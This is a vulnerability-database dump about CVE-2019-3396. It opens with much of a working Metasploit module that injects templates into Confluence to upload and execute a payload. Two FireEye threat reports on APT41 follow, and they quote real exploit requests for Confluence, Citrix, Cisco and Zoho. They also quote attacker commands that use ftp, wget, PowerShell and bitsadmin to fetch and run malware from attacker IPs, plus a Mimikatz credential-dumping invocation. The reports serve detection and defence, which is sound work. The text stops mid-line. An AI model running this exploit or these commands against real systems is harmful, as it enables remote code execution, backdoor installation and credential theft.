\n'DefaultOptions' => \n{ \n'RPORT' => 8090, \n'SRVPORT' => 8021, \n}, \n'Privileged' => false, \n'DisclosureDate' => 'Mar 25 2019', \n'DefaultTarget' => 0, \n'Stance' => Msf::Exploit::Stance::Aggressive \n)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'The base to Confluence', '/']), \nOptString.new('TRIGGERURL', [true, 'Url to external video service to trigger vulnerability', \n'https://www.youtube.com/watch?v=dQw4w9WgXcQ']) \n]) \nend \n \n# Handles ftp RETP command. \n# \n# @param c [Socket] Control connection socket. \n# @param arg [String] RETR argument. \n# @return [void] \ndef on_client_command_retr(c, arg) \nvprint_status(\"FTP download request for #{arg}\") \nconn = establish_data_connection(c) \nif(not conn) \nc.put(\"425 Can't build data connection\\r\\n\") \nreturn \nend \n \nc.put(\"150 Opening BINARY mode data connection for #{arg}\\r\\n\") \ncase arg \nwhen /check\\.vm$/ \nconn.put(wrap(get_check_vm)) \nwhen /javaprop\\.vm$/ \nconn.put(wrap(get_javaprop_vm)) \nwhen /upload\\.vm$/ \nconn.put(wrap(get_upload_vm)) \nwhen /exec\\.vm$/ \nconn.put(wrap(get_exec_vm)) \nelse \nconn.put(wrap(get_dummy_vm)) \nend \nc.put(\"226 Transfer complete.\\r\\n\") \nconn.close \nend \n \n# Handles ftp PASS command to suppress output. \n# \n# @param c [Socket] Control connection socket. \n# @param arg [String] PASS argument. \n# @return [void] \ndef on_client_command_pass(c, arg) \n@state[c][:pass] = arg \nvprint_status(\"#{@state[c][:name]} LOGIN #{@state[c][:user]} / #{@state[c][:pass]}\") \nc.put \"230 Login OK\\r\\n\" \nend \n \n# Handles ftp EPSV command to suppress output. \n# \n# @param c [Socket] Control connection socket. \n# @param arg [String] EPSV argument. \n# @return [void] \ndef on_client_command_epsv(c, arg) \nvprint_status(\"#{@state[c][:name]} UNKNOWN 'EPSV #{arg}'\") \nc.put(\"500 'EPSV #{arg}': command not understood.\\r\\n\") \nend \n \n# Returns a upload template. \n# \n# @return [String] \ndef get_upload_vm \n( \n<<~EOF \n$i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{@fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{@b64}')) \nEOF \n) \nend \n \n# Returns a command execution template. \n# \n# @return [String] \ndef get_exec_vm \n( \n<<~EOF \n$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{@command}').waitFor() \nEOF \n) \nend \n \n# Returns checking template. \n# \n# @return [String] \ndef get_check_vm \n( \n<<~EOF \n#{@check_text} \nEOF \n) \nend \n \n# Returns Java's getting property template. \n# \n# @return [String] \ndef get_javaprop_vm \n( \n<<~EOF \n$i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{@prop}').toString() \nEOF \n) \nend \n \n# Returns dummy template. \n# \n# @return [String] \ndef get_dummy_vm \n( \n<<~EOF \nEOF \n) \nend \n \n# Checks the vulnerability. \n# \n# @return [Array] Check code \ndef check \ncheckcode = Exploit::CheckCode::Safe \nbegin \n# Start the FTP service \nprint_status(\"Starting the FTP server.\") \nstart_service \n \n@check_text = Rex::Text.rand_text_alpha(5..10) \nres = inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}check.vm\") \nif res && res.body && res.body.include?(@check_text) \ncheckcode = Exploit::CheckCode::Vulnerable \nend \nrescue Msf::Exploit::Failed => e \nvprint_error(e.message) \ncheckcode = Exploit::CheckCode::Unknown \nend \ncheckcode \nend \n \n# Injects Java code to the template. \n# \n# @param service_url [String] Address of template to injection. \n# @return [void] \ndef inject_template(service_url, timeout=20) \n \nuri = normalize_uri(target_uri.path, 'rest', 'tinymce', '1', 'macro', 'preview') \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => uri, \n'headers' => { \n'Accept' => '*/*', \n'Origin' => full_uri(vhost_uri: true) \n}, \n'ctype' => 'application/json; charset=UTF-8', \n'data' => { \n'contentId' => '1', \n'macro' => { \n'name' => 'widget', \n'body' => '', \n'params' => { \n'url' => datastore['TRIGGERURL'], \n'_template' => service_url \n} \n \n} \n}.to_json \n}, timeout=timeout) \n \nunless res \nunless service_url.include?(\"exec.vm\") \nprint_warning('Connection timed out in #inject_template') \nend \nreturn \nend \n \nif res.body.include? 'widget-error' \nprint_error('Failed to inject and execute code:') \nelse \nvprint_status(\"Server response:\") \nend \n \nvprint_line(res.body) \n \nres \nend \n \n# Returns a system property for Java. \n# \n# @param prop [String] Name of the property to retrieve. \n# @return [String] \ndef get_java_property(prop) \n@prop = prop \nres = inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}javaprop.vm\") \nif res && res.body \nreturn clear_response(res.body) \nend \n'' \nend \n \n# Returns the target platform. \n# \n# @return [String] \ndef get_target_platform \nreturn get_java_property('os.name') \nend \n \n# Checks if the target os/platform is compatible with the module target or not. \n# \n# @return [TrueClass] Compatible \n# @return [FalseClass] Not compatible \ndef target_platform_compat?(target_platform) \ntarget.platform.names.each do |n| \nif n.downcase == 'java' || target_platform.downcase.include?(n.downcase) \nreturn true \nend \nend \n \nfalse \nend \n \n# Returns a temp path from the remote target. \n# \n# @return [String] \ndef get_tmp_path \nreturn get_java_property('java.io.tmpdir') \nend \n \n# Returns the Java home path used by Confluence. \n# \n# @return [String] \ndef get_java_home_path \nreturn get_java_property('java.home') \nend \n \n# Returns Java code that can be used to inject to the template in order to copy a file. \n# \n# @note The purpose of this method is to have a file that is not busy, so we can execute it. \n# It is meant to be used with #get_write_file_code. \n# \n# @param fname [String] The file to copy \n# @param new_fname [String] The new file \n# @return [void] \ndef get_dup_file_code(fname, new_fname) \nif fname =~ /^\\/[[:print:]]+/ \n@command = \"cp #{fname} #{new_fname}\" \nelse \n@command = \"cmd.exe /C copy #{fname} #{new_fname}\" \nend \n \ninject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\") \nend \n \n# Returns the normalized file path for payload. \n# \n# @return [String] \ndef normalize_payload_fname(tmp_path, fname) \n# A quick way to check platform insteaf of actually grabbing os.name in Java system properties. \nif /^\\/[[:print:]]+/ === tmp_path \nRex::FileUtils.normalize_unix_path(tmp_path, fname) \nelse \nRex::FileUtils.normalize_win_path(tmp_path, fname) \nend \nend \n \n# Exploits the target in Java platform. \n# \n# @return [void] \ndef exploit_as_java \n \ntmp_path = get_tmp_path \n \nif tmp_path.blank? \nfail_with(Failure::Unknown, 'Unable to get the temp path.') \nend \n \n@fname = normalize_payload_fname(tmp_path, \"#{Rex::Text.rand_text_alpha(5)}.jar\") \n@b64 = Rex::Text.encode_base64(payload.encoded_jar) \n@command = '' \n \njava_home = get_java_home_path \n \nif java_home.blank? \nfail_with(Failure::Unknown, 'Unable to find java home path on the remote machine.') \nelse \nvprint_status(\"Found Java home path: #{java_home}\") \nend \n \nregister_files_for_cleanup(@fname) \n \nif /^\\/[[:print:]]+/ === @fname \nnormalized_java_path = Rex::FileUtils.normalize_unix_path(java_home, '/bin/java') \n@command = %Q|#{normalized_java_path} -jar #{@fname}| \nelse \nnormalized_java_path = Rex::FileUtils.normalize_win_path(java_home, '\\\\bin\\\\java.exe') \n@fname.gsub!(/Program Files/, 'PROGRA~1') \n@command = %Q|cmd.exe /C \"#{normalized_java_path}\" -jar #{@fname}| \nend \n \nprint_status(\"Attempting to upload #{@fname}\") \ninject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\") \n \nprint_status(\"Attempting to execute #{@fname}\") \ninject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5) \nend \n \n \n# Exploits the target in Windows platform. \n# \n# @return [void] \ndef exploit_as_windows \ntmp_path = get_tmp_path \n \nif tmp_path.blank? \nfail_with(Failure::Unknown, 'Unable to get the temp path.') \nend \n \n@b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform)) \n@fname = normalize_payload_fname(tmp_path,\"#{Rex::Text.rand_text_alpha(5)}.exe\") \nnew_fname = normalize_payload_fname(tmp_path,\"#{Rex::Text.rand_text_alpha(5)}.exe\") \n@fname.gsub!(/Program Files/, 'PROGRA~1') \nnew_fname.gsub!(/Program Files/, 'PROGRA~1') \nregister_files_for_cleanup(@fname, new_fname) \n \nprint_status(\"Attempting to upload #{@fname}\") \ninject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\") \n \nprint_status(\"Attempting to copy payload to #{new_fname}\") \nget_dup_file_code(@fname, new_fname) \n \nprint_status(\"Attempting to execute #{new_fname}\") \n@command = new_fname \ninject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5) \nend \n \n \n# Exploits the target in Linux platform. \n# \n# @return [void] \ndef exploit_as_linux \ntmp_path = get_tmp_path \n \nif tmp_path.blank? \nfail_with(Failure::Unknown, 'Unable to get the temp path.') \nend \n \n@b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform)) \n@fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(5)) \nnew_fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(6)) \nregister_files_for_cleanup(@fname, new_fname) \n \nprint_status(\"Attempting to upload #{@fname}\") \ninject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\") \n \n@command = \"chmod +x #{@fname}\" \ninject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\") \n \nprint_status(\"Attempting to copy payload to #{new_fname}\") \nget_dup_file_code(@fname, new_fname) \n \nprint_status(\"Attempting to execute #{new_fname}\") \n@command = new_fname \ninject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5) \nend \n \ndef exploit \n@wrap_marker = Rex::Text.rand_text_alpha(5..10) \n \n# Start the FTP service \nprint_status(\"Starting the FTP server.\") \nstart_service \n \ntarget_platform = get_target_platform \nif target_platform.nil? \nfail_with(Failure::Unreachable, 'Target did not respond to OS check. Confirm RHOSTS and RPORT, then run \"check\".') \nelse \nprint_status(\"Target being detected as: #{target_platform}\") \nend \n \nunless target_platform_compat?(target_platform) \nfail_with(Failure::BadConfig, 'Selected module target does not match the actual target.') \nend \n \ncase target.name.downcase \nwhen /java$/ \nexploit_as_java \nwhen /windows$/ \nexploit_as_windows \nwhen /linux$/ \nexploit_as_linux \nend \nend \n \n# Wraps request. \n# \n# @return [String] \ndef wrap(string) \n\"#{@wrap_marker}\\n#{string}#{@wrap_marker}\\n\" \nend \n \n# Returns unwrapped response. \n# \n# @return [String] \ndef clear_response(string) \nif match = string.match(/#{@wrap_marker}\\n(.*)\\n#{@wrap_marker}\\n/m) \nreturn match.captures[0] \nend \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/152568/confluence_widget_connector.rb.txt"}], "fireeye": [{"lastseen": "2020-11-23T01:53:50", "bulletinFamily": "info", "cvelist": ["CVE-2019-3396"], "description": "In August 2019, FireEye released the \u201cDouble Dragon\u201d report on our newest graduated threat group, APT41. A China-nexus dual espionage and financially-focused group, APT41 targets industries such as gaming, healthcare, high-tech, higher education, telecommunications, and travel services. APT41 is known to adapt quickly to changes and detections within victim environments, often recompiling malware within hours of incident responder activity. In multiple situations, we also identified APT41 utilizing recently-disclosed vulnerabilities, often weaponzing and exploiting within a matter of days.\n\nOur knowledge of this group\u2019s targets and activities are rooted in our Incident Response and Managed Defense services, where we encounter actors like APT41 on a regular basis. At each encounter, FireEye works to reverse malware, collect intelligence and hone our detection capabilities. This ultimately feeds back into our Managed Defense and Incident Response teams detecting and stopping threat actors earlier in their campaigns.\n\nIn this blog post, we\u2019re going to examine a recent instance where [FireEye Managed Defense](<https://www.fireeye.com/solutions/managed-defense.html>) came toe-to-toe with APT41. Our goal is to display not only how dynamic this group can be, but also how the various teams within FireEye worked to thwart attacks within hours of detection \u2013 protecting our clients\u2019 networks and limiting the threat actor\u2019s ability to gain a foothold and/or prevent data exposure.\n\n#### GET TO DA CHOPPA!\n\nIn April 2019, FireEye\u2019s Managed Defense team identified suspicious activity on a publicly-accessible web server at a U.S.-based research university. This activity, a snippet of which is provided in Figure 1, indicated that the attackers were exploiting [CVE-2019-3396](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>), a vulnerability in Atlassian Confluence Server that allowed for path traversal and remote code execution.\n\n \nFigure 1: Snippet of PCAP showing attacker attempting CVE-2019-3396 vulnerability\n\nThis vulnerability relies on the following actions by the attacker:\n\n * Customizing the _template field to utilize a template that allowed for command execution.\n * Inserting a cmd field that provided the command to be executed.\n\nThrough custom JSON POST requests, the attackers were able to run commands and force the vulnerable system to download an additional file. Figure 2 provides a list of the JSON data sent by the attacker.\n\n \nFigure 2: Snippet of HTTP POST requests exploiting CVE-2019-3396\n\nAs shown in Figure 2, the attacker utilized a template located at hxxps[:]//github[.]com/Yt1g3r/CVE-2019-3396_EXP/blob/master/cmd.vm. This publicly-available template provided a vehicle for the attacker to issue arbitrary commands against the vulnerable system. Figure 3 provides the code of the file cmd.vm.\n\n \nFigure 3: Code of cmd.vm, used by the attackers to execute code on a vulnerable Confluence system\n\nThe HTTP POST requests in Figure 2, which originated from the IP address 67.229.97[.]229, performed system reconnaissance and utilized Windows certutil.exe to download a file located at hxxp[:]//67.229.97[.]229/pass_sqzr.jsp and save it as test.jsp (MD5: 84d6e4ba1f4268e50810dacc7bbc3935). The file test.jsp was ultimately identified to be a variant of a [**China Chopper** webshell](<https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html>).\n\n#### A Passive Aggressive Operation\n\nShortly after placing test.jsp on the vulnerable system, the attackers downloaded two additional files onto the system:\n\n * 64.dat (MD5: 51e06382a88eb09639e1bc3565b444a6)\n * Ins64.exe (MD5: e42555b218248d1a2ba92c1532ef6786)\n\nBoth files were hosted at the same IP address utilized by the attacker, 67[.]229[.]97[.]229. The file Ins64.exe was used to deploy the HIGHNOON backdoor on the system. HIGHNOON is a backdoor that consists of multiple components, including a loader, dynamic-link library (DLL), and a rootkit. When loaded, the DLL may deploy one of two embedded drivers to conceal network traffic and communicate with its command and control server to download and launch memory-resident DLL plugins. This particular variant of HIGHNOON is tracked as HIGHNOON.PASSIVE by FireEye. (An exploration of passive backdoors and more analysis of the HIGHNOON malware family can be found in our full [APT41 report](<https://content.fireeye.com/apt-41/rpt-apt41>)).\n\nWithin the next 35 minutes, the attackers utilized both the test.jsp web shell and the HIGHNOON backdoor to issue commands to the system. As China Chopper relies on HTTP requests, attacker traffic to and from this web shell was easily observed via network monitoring. The attacker utilized China Chopper to perform the following:\n\n * Movement of 64.dat and Ins64.exe to C:\\Program Files\\Atlassian\\Confluence\n * Performing a directory listing of C:\\Program Files\\Atlassian\\Confluence\n * Performing a directory listing of C:\\Users\n\nAdditionally, FireEye\u2019s FLARE team reverse engineered the custom protocol utilized by the HIGHNOON backdoor, allowing us to decode the attacker\u2019s traffic. Figure 4 provides a list of the various commands issued by the attacker utilizing HIGHNOON.\n\n \nFigure 4: Decoded HIGHNOON commands issued by the attacker\n\n#### Playing Their ACEHASH Card\n\nAs shown in Figure 4, the attacker utilized the HIGHNOON backdoor to execute a PowerShell command that downloaded a script from [PowerSploit](<https://github.com/PowerShellMafia/PowerSploit>), a well-known PowerShell Post-Exploitation Framework. At the time of this blog post, the script was no longer available for downloading. The commands provided to the script \u2013 \u201cprivilege::debug sekurlsa::logonpasswords exit exit\u201d \u2013 indicate that the unrecovered script was likely a copy of [Invoke-Mimikatz](<https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1>), reflectively loading Mimikatz 2.0 in-memory. Per the observed HIGHNOON output, this command failed.\n\nAfter performing some additional reconnaissance, the attacker utilized HIGHNOON to download two additional files into the C:\\Program Files\\Atlassian\\Confluence directory:\n\n * c64.exe (MD5: 846cdb921841ac671c86350d494abf9c)\n * F64.data (MD5: a919b4454679ef60b39c82bd686ed141)\n\nThese two files are the dropper and encrypted/compressed payload components, respectively, of a malware family known as ACEHASH. ACEHASH is a credential theft and password dumping utility that combines the functionality of multiple tools such as Mimikatz, hashdump, and Windows Credential Editor (WCE).\n\nUpon placing c64.exe and F64.data on the system, the attacker ran the command\n\nc64.exe f64.data \"9839D7F1A0 -m\u201d\n\nThis specific command provided a password of \u201c9839D7F1A0\u201d to decrypt the contents of F64.data, and a switch of \u201c-m\u201d, indicating the attacker wanted to replicate the functionality of Mimikatz. With the correct password provided, c64.exe loaded the decrypted and decompressed shellcode into memory and harvested credentials.\n\nUltimately, the attacker was able to exploit a vulnerability, execute code, and download custom malware on the vulnerable Confluence system. While Mimikatz failed, via ACEHASH they were able to harvest a single credential from the system. However, as Managed Defense detected this activity rapidly via network signatures, this operation was neutralized before the attackers progressed any further.\n\n#### Key Takeaways From This Incident\n\n * APT41 utilized multiple malware families to maintain access into this environment; impactful remediation requires full scoping of an incident.**__**\n * For effective Managed Detection &amp; Response services, having coverage of both Endpoint and Network is critical for detecting and responding to targeted attacks.**__**\n * Attackers may weaponize vulnerabilities quickly after their release, especially if they are present within a targeted environment. Patching of critical vulnerabilities ASAP is crucial to deter active attackers.\n\n#### Detecting the Techniques\n\nFireEye detects this activity across our platform, including detection for certutil usage, HIGHNOON, and China Chopper.\n\n**Detection**\n\n| \n\n**Signature Name** \n \n---|--- \n \n**China Chopper**\n\n| \n\nFE_Webshell_JSP_CHOPPER_1**** \n \n** **\n\n| \n\nFE_Webshell_Java_CHOPPER_1**** \n \n** **\n\n| \n\nFE_Webshell_MSIL_CHOPPER_1**** \n \n**HIGHNOON.PASSIVE**\n\n| \n\nFE_APT_Backdoor_Raw64_HIGHNOON_2 \n \n** **\n\n| \n\nFE_APT_Backdoor_Win64_HIGHNOON_2 \n \n**Certutil Downloader**\n\n| \n\nCERTUTIL.EXE DOWNLOADER (UTILITY) \n \n** **\n\n| \n\nCERTUTIL.EXE DOWNLOADER A (UTILITY) \n \n**ACEHASH**\n\n| \n\nFE_Trojan_AceHash \n \n#### Indicators\n\n**Type**\n\n| \n\n**Indicator**\n\n| \n\n**MD5 Hash (if applicable)** \n \n---|---|--- \n \nFile\n\n| \n\ntest.jsp\n\n| \n\n84d6e4ba1f4268e50810dacc7bbc3935 \n \nFile\n\n| \n\n64.dat\n\n| \n\n51e06382a88eb09639e1bc3565b444a6 \n \nFile\n\n| \n\nIns64.exe\n\n| \n\ne42555b218248d1a2ba92c1532ef6786 \n \nFile\n\n| \n\nc64.exe\n\n| \n\n846cdb921841ac671c86350d494abf9c \n \nFile\n\n| \n\nF64.data\n\n| \n\na919b4454679ef60b39c82bd686ed141 \n \nIP Address\n\n| \n\n67.229.97[.]229\n\n| \n\nN/A \n \nLooking for more? [Join us for a webcast](<https://www.brighttalk.com/webcast/7451/366611/double-dragon-apt41-a-dual-espionage-and-cyber-crime-operation>) on August 29, 2019 where we detail more of APT41\u2019s activities. You can also find a direct link to the public APT41 report [here](<https://content.fireeye.com/apt-41/rpt-apt41/>).\n\n#### Acknowledgements\n\nSpecial thanks to Dan Perez, Andrew Thompson, Tyler Dean, Raymond Leong, and Willi Ballenthin for identification and reversing of the HIGHNOON.PASSIVE malware.\n", "modified": "2019-08-19T17:30:00", "published": "2019-08-19T17:30:00", "id": "FIREEYE:B394E05FC4834992E8F05135E3087CAD", "href": "https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html", "type": "fireeye", "title": "GAME OVER: Detecting and Stopping an APT41 Operation", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-23T01:51:24", "bulletinFamily": "info", "cvelist": ["CVE-2019-1652", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-10189", "CVE-2020-10198"], "description": "Beginning this year, FireEye observed [Chinese actor APT41](<https://content.fireeye.com/apt-41/rpt-apt41/>) carry out one of the broadest campaigns by a Chinese cyber espionage actor we have observed in recent years. Between January 20 and March 11, FireEye observed APT41 attempt to exploit vulnerabilities in [Citrix NetScaler/ADC](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>), Cisco routers, and [Zoho ManageEngine Desktop Central](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>) at over 75 FireEye customers. Countries we\u2019ve seen targeted include Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, UAE, UK and USA. The following industries were targeted: Banking/Finance, Construction, Defense Industrial Base, Government, Healthcare, High Technology, Higher Education, Legal, Manufacturing, Media, Non-profit, Oil &amp; Gas, Petrochemical, Pharmaceutical, Real Estate, Telecommunications, Transportation, Travel, and Utility. It\u2019s unclear if APT41 scanned the Internet and attempted exploitation en masse or selected a subset of specific organizations to target, but the victims appear to be more targeted in nature.\n\n#### Exploitation of CVE-2019-19781 (Citrix Application Delivery Controller [ADC])\n\nStarting on January 20, 2020, APT41 used the IP address 66.42.98[.]220 to attempt exploits of Citrix Application Delivery Controller (ADC) and Citrix Gateway devices with [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>) (published December 17, 2019).\n\n \nFigure 1: Timeline of key events\n\nThe initial CVE-2019-19781 exploitation activity on January 20 and January 21, 2020, involved execution of the command \u2018file /bin/pwd\u2019, which may have achieved two objectives for APT41. First, it would confirm whether the system was vulnerable and the [mitigation](<https://support.citrix.com/article/CTX267679>) wasn\u2019t applied. Second, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step. \n\nOne interesting thing to note is that all observed requests were only performed against Citrix devices, suggesting APT41 was operating with an already-known list of identified devices accessible on the internet.\n\nPOST /vpns/portal/scripts/newbm.pl HTTP/1.1 \nHost: [redacted] \nConnection: close \nAccept-Encoding: gzip, deflate \nAccept: */* \nUser-Agent: python-requests/2.22.0 \nNSC_NONCE: nsroot \nNSC_USER: ../../../netscaler/portal/templates/[redacted] \nContent-Length: 96 \n \nurl=http://example.com&amp;title=[redacted]&amp;desc=[% template.new('BLOCK' = 'print `file /bin/pwd`') %] \n \n--- \n \nFigure 2: Example APT41 HTTP traffic exploiting CVE-2019-19781\n\nThere is a lull in APT41 activity between January 23 and February 1, which is likely related to the Chinese Lunar New Year holidays which occurred between January 24 and January 30, 2020. This has been a common activity pattern by Chinese APT groups in past years as well.\n\nStarting on February 1, 2020, APT41 moved to using CVE-2019-19781 exploit payloads that initiate a download via the File Transfer Protocol (FTP). Specifically, APT41 executed the command \u2018/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\\@66.42.98[.]220/bsd\u2019, which connected to 66.42.98[.]220 over the FTP protocol, logged in to the FTP server with a username of \u2018test\u2019 and a password that we have redacted, and then downloaded an unknown payload named \u2018bsd\u2019 (which was likely a backdoor).\n\nPOST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1 \nAccept-Encoding: identity \nContent-Length: 147 \nConnection: close \nNsc_User: ../../../netscaler/portal/templates/[redacted] \nUser-Agent: Python-urllib/2.7 \nNsc_Nonce: nsroot \nHost: [redacted] \nContent-Type: application/x-www-form-urlencoded \n \nurl=http://example.com&amp;title=[redacted]&amp;desc=[% template.new('BLOCK' = '**print `/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\\@66.42.98[.]220/bsd**`') %] \n \n--- \n \nFigure 3: Example APT41 HTTP traffic exploiting CVE-2019-19781\n\nWe did not observe APT41 activity at FireEye customers between February 2 and February 19, 2020. China initiated COVID-19 related quarantines in cities in Hubei province starting on January 23 and January 24, and rolled out quarantines to additional provinces starting between February 2 and February 10. While it is possible that this reduction in activity might be related to the COVID-19 quarantine measures in China, APT41 may have remained active in other ways, which we were unable to observe with FireEye telemetry. We observed a significant uptick in CVE-2019-19781 exploitation on February 24 and February 25. The exploit behavior was almost identical to the activity on February 1, where only the name of the payload \u2018un\u2019 changed.\n\nPOST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1 \nAccept-Encoding: identity \nContent-Length: 145 \nConnection: close \nNsc_User: ../../../netscaler/portal/templates/[redacted] \nUser-Agent: Python-urllib/2.7 \nNsc_Nonce: nsroot \nHost: [redacted] \nContent-Type: application/x-www-form-urlencoded \n \nurl=http://example.com&amp;title= [redacted]&amp;desc=[% template.new('BLOCK' = '**print `/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\\@66.42.98[.]220/un**`') %] \n \n--- \n \nFigure 4: Example APT41 HTTP traffic exploiting CVE-2019-19781\n\nCitrix released a [mitigation](<https://support.citrix.com/article/CTX267027>) for CVE-2019-19781 on December 17, 2019, and as of January 24, 2020, released permanent fixes for all supported versions of Citrix ADC, Gateway, and SD-WAN WANOP.\n\n#### Cisco Router Exploitation\n\nOn February 21, 2020, APT41 successfully exploited a Cisco RV320 router at a telecommunications organization and downloaded a 32-bit ELF binary payload compiled for a 64-bit MIPS processor named \u2018fuc\u2019 (MD5: 155e98e5ca8d662fad7dc84187340cbc). It is unknown what specific exploit was used, but there is a Metasploit module that combines two CVE\u2019s ([CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) and [CVE-2019-1652](<https://nvd.nist.gov/vuln/detail/CVE-2019-1652>)) to [enable remote code execution on Cisco RV320 and RV325](<https://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv32x_rce>) small business routers and uses wget to download the specified payload.\n\nGET /test/fuc \nHTTP/1.1 \nHost: 66.42.98\\\\.220 \nUser-Agent: Wget \nConnection: close \n \n--- \n \nFigure 5: Example HTTP request showing Cisco RV320 router downloading a payload via wget\n\n66.42.98[.]220 also hosted a file name http://66.42.98[.]220/test/1.txt. The content of 1.txt (MD5: c0c467c8e9b2046d7053642cc9bdd57d) is \u2018cat /etc/flash/etc/nk_sysconfig\u2019, which is the command one would execute on a Cisco RV320 router to display the current configuration.\n\nCisco PSIRT confirmed that fixed software to address the noted vulnerabilities is available and asks customers to review the following security advisories and take appropriate action:\n\n * [Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info>)\n * [Cisco Small Business RV320 and RV325 Routers Command Injection Vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject>)\n\n#### Exploitation of CVE-2020-10189 (Zoho ManageEngine Zero-Day Vulnerability)\n\nOn March 5, 2020, researcher [Steven Seeley](<https://twitter.com/steventseeley/status/1235635108498948096?s=20>), published [an advisory](<https://srcincite.io/advisories/src-2020-0011/>) and released [proof-of-concept code](<https://srcincite.io/pocs/src-2020-0011.py.txt>) for a zero-day remote code execution vulnerability in Zoho ManageEngine Desktop Central versions prior to 10.0.474 ([CVE-2020-10189)](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>). Beginning on March 8, FireEye observed APT41 use 91.208.184[.]78 to attempt to exploit the Zoho ManageEngine vulnerability at more than a dozen FireEye customers, which resulted in the compromise of at least five separate customers. FireEye observed two separate variations of how the payloads (install.bat and storesyncsvc.dll) were deployed. In the first variation the CVE-2020-10189 exploit was used to directly upload \u201clogger.zip\u201d, a simple Java based program, which contained a set of commands to use PowerShell to download and execute install.bat and storesyncsvc.dll.\n\njava/lang/Runtime\n\ngetRuntime\n\n()Ljava/lang/Runtime;\n\nXcmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/install.bat','C:\\ \nWindows\\Temp\\install.bat')&amp;powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/storesyncsvc.dll',' \nC:\\Windows\\Temp\\storesyncsvc.dll')&amp;C:\\Windows\\Temp\\install.bat\n\n'(Ljava/lang/String;)Ljava/lang/Process;\n\nStackMapTable\n\nysoserial/Pwner76328858520609\n\nLysoserial/Pwner76328858520609; \n \n--- \n \nFigure 6: Contents of logger.zip\n\nHere we see a toolmark from the tool [ysoserial](<https://github.com/frohoff/ysoserial>) that was used to create the payload in the POC. The string Pwner76328858520609 is unique to the POC payload, indicating that APT41 likely used the POC as source material in their operation.\n\nIn the second variation, FireEye observed APT41 leverage the Microsoft BITSAdmin command-line tool to download install.bat (MD5: 7966c2c546b71e800397a67f942858d0) from known APT41 infrastructure 66.42.98[.]220 on port 12345.\n\nParent Process: C:\\ManageEngine\\DesktopCentral_Server\\jre\\bin\\java.exe\n\nProcess Arguments: cmd /c bitsadmin /transfer bbbb http://66.42.98[.]220:12345/test/install.bat C:\\Users\\Public\\install.bat \n \n--- \n \nFigure 7: Example FireEye Endpoint Security event depicting successful CVE-2020-10189 exploitation\n\nIn both variations, the install.bat batch file was used to install persistence for a trial-version of Cobalt Strike BEACON loader named storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f).\n\n@echo off\n\nset 